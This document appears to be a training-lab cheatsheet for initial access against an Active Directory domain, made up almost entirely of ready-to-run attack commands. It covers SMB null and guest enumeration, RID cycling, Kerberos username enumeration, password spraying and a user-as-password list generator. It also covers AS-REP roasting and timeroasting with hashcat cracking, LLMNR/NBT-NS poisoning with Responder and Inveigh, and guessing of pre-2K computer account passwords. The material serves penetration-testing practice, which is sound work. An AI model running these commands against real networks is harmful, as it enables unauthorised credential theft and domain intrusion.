Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access

Cheatsheet

Use this as the fast path. Replace values when the lab changes.

export DC=10.10.10.200
export DOMAIN=ootw.local
export NETBIOS=OOTW

Discovery

fping -asgq 10.10.10.0/24
nmap -Pn -sV -p 53,88,135,139,389,445,464,593,636,3268,3269 $DC
nmap -Pn --script smb-protocols,smb2-security-mode -p445 $DC
dig @$DC _ldap._tcp.dc._msdcs.$DOMAIN SRV
dig @$DC _kerberos._tcp.$DOMAIN SRV
nslookup $DOMAIN $DC

SMB Null And Guest

smbclient -L //$DC -N
smbclient -L //$DC -U 'guest%'
nxc smb $DC -u '' -p '' --shares
nxc smb $DC -u 'guest' -p '' --shares
smbmap -H $DC -u '' -p ''
smbmap -H $DC -u 'guest' -p ''

RID Cycling

lookupsid.py "$NETBIOS/Guest:@$DC"
nxc smb $DC -u 'guest' -p '' --rid-brute
enum4linux-ng -R 500-3000 $DC

Manual RID loop:

rpcclient $DC -U 'guest%' -c 'lsaquery'
export SID='S-1-5-21-REPLACE-ME'
for RID in $(seq 500 2000); do rpcclient $DC -U 'guest%' -c "lookupsids $SID-$RID"; done | tee rid.txt

Username Enumeration

kerbrute userenum -d $DOMAIN --dc $DC users.txt -o kerbrute-users.txt

Normalize usernames:

cat raw-users.txt | tr '[:upper:]' '[:lower:]' | sort -u > users.txt

Password Policy

rpcclient $DC -U 'guest%' -c 'querydominfo'
enum4linux-ng -P $DC
nxc smb $DC -u alice.wright -p 'StudentPass2026!' --pass-pol

Windows:

net accounts /domain

Password Spraying

kerbrute passwordspray -d $DOMAIN --dc $DC users.txt 'Password123'
nxc smb $DC -u users.txt -p 'Password123' --continue-on-success
nxc smb $DC -u users.txt -p users.txt --no-bruteforce --continue-on-success

User-as-password permutations:

while read u; do low=$(echo "$u" | tr '[:upper:]' '[:lower:]'); cap="$(tr '[:lower:]' '[:upper:]' <<< ${low:0:1})${low:1}"; for p in "$low" "$cap" "${low}1" "${low}123" "${cap}1" "${cap}123" "${cap}!"; do echo "$p"; done; done < users.txt | sort -u > passlist.txt

ASREP Roasting

GetNPUsers.py $DOMAIN/ -usersfile users.txt -dc-ip $DC -no-pass -format hashcat -outputfile asrep.hashes
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show

OOTW quick check:

printf 'svc_legacy\nalice.wright\nsvc_sql\n' > users.txt
GetNPUsers.py $DOMAIN/ -usersfile users.txt -dc-ip $DC -no-pass -format hashcat -outputfile asrep.hashes

LLMNR NBT-NS Poisoning

Passive:

sudo responder -I eth0 -A

Active:

sudo responder -I eth0

Crack:

hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt

Windows Inveigh:

.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console Y -FileOutput Y

Pre-2K Computer Accounts

while read c; do nxc smb $DC -u "${c}$" -p "$(echo "$c" | tr '[:upper:]' '[:lower:]')" --continue-on-success; done < computers.txt

Timeroasting

sudo nxc smb $DC -M timeroast
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt

Validate Credentials

nxc smb $DC -d $DOMAIN -u alice.wright -p 'StudentPass2026!'
nxc ldap $DC -d $DOMAIN -u alice.wright -p 'StudentPass2026!'
nxc winrm 10.10.10.201 -d $DOMAIN -u helpdesk.one -p 'Helpdesk2026!'
kinit alice.wright@OOTW.LOCAL
klist